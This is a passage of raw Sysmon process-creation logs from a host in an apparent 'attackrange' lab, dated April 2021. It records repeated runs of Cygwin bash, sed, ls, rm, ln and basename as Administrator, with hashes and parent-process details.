14:56:02.492{A8622C2F-5402-6078-240C-00000000AE01}4696C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-230C-00000000AE01}6700C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057069Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.484{A8622C2F-5402-6078-230C-00000000AE01}6700C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-210C-00000000AE01}1100C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057059Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.476{A8622C2F-5402-6078-220C-00000000AE01}5052C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-210C-00000000AE01}1100C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057047Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.468{A8622C2F-5402-6078-210C-00000000AE01}1100C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.460{A8622C2F-5402-6078-200C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-1F0C-00000000AE01}3788C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057025Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.452{A8622C2F-5402-6078-1F0C-00000000AE01}3788C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057011Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.442{A8622C2F-5402-6078-1E0C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-1D0C-00000000AE01}3208C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057001Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.434{A8622C2F-5402-6078-1D0C-00000000AE01}3208C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056991Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.426{A8622C2F-5402-6078-1C0C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-1B0C-00000000AE01}928C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056981Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.418{A8622C2F-5402-6078-1B0C-00000000AE01}928C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056971Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.410{A8622C2F-5402-6078-1A0C-00000000AE01}4344C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-190C-00000000AE01}4604C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.401{A8622C2F-5402-6078-190C-00000000AE01}4604C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-180C-00000000AE01}1800C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056951Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.393{A8622C2F-5402-6078-180C-00000000AE01}1800C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056939Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.384{A8622C2F-5402-6078-170C-00000000AE01}6332C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-160C-00000000AE01}4056C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056929Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.375{A8622C2F-5402-6078-160C-00000000AE01}4056C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-140C-00000000AE01}6748C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056919Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.367{A8622C2F-5402-6078-150C-00000000AE01}612C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-140C-00000000AE01}6748C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.359{A8622C2F-5402-6078-140C-00000000AE01}6748C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056895Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.351{A8622C2F-5402-6078-130C-00000000AE01}3200C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-120C-00000000AE01}6884C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056885Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.342{A8622C2F-5402-6078-120C-00000000AE01}6884C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-100C-00000000AE01}4696C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056875Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.334{A8622C2F-5402-6078-110C-00000000AE01}2084C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-100C-00000000AE01}4696C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056863Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.326{A8622C2F-5402-6078-100C-00000000AE01}4696C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056851Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.318{A8622C2F-5402-6078-0F0C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-0E0C-00000000AE01}5396C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056841Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.309{A8622C2F-5402-6078-0E0C-00000000AE01}5396C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056829Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.301{A8622C2F-5402-6078-0D0C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-0C0C-00000000AE01}4788C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056819Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.293{A8622C2F-5402-6078-0C0C-00000000AE01}4788C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.285{A8622C2F-5402-6078-0B0C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-0A0C-00000000AE01}5800C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.277{A8622C2F-5402-6078-0A0C-00000000AE01}5800C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056789Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.268{A8622C2F-5402-6078-090C-00000000AE01}6084C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-080C-00000000AE01}1476C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056779Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.260{A8622C2F-5402-6078-080C-00000000AE01}1476C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-070C-00000000AE01}4344C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.251{A8622C2F-5402-6078-070C-00000000AE01}4344C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.243{A8622C2F-5402-6078-060C-00000000AE01}2664C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-050C-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056747Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.234{A8622C2F-5402-6078-050C-00000000AE01}5312C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-030C-00000000AE01}6332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056737Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.226{A8622C2F-5402-6078-040C-00000000AE01}4288C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-030C-00000000AE01}6332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056725Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.219{A8622C2F-5402-6078-030C-00000000AE01}6332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056713Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.210{A8622C2F-5402-6078-020C-00000000AE01}1100C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-010C-00000000AE01}2408C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056703Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.202{A8622C2F-5402-6078-010C-00000000AE01}2408C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-FF0B-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056693Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.193{A8622C2F-5402-6078-000C-00000000AE01}6336C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-FF0B-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056681Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.186{A8622C2F-5402-6078-FF0B-00000000AE01}3200C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.177{A8622C2F-5402-6078-FE0B-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-FD0B-00000000AE01}2824C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.169{A8622C2F-5402-6078-FD0B-00000000AE01}2824C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056647Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.160{A8622C2F-5402-6078-FC0B-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-FB0B-00000000AE01}5108C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.152{A8622C2F-5402-6078-FB0B-00000000AE01}5108C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056627Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
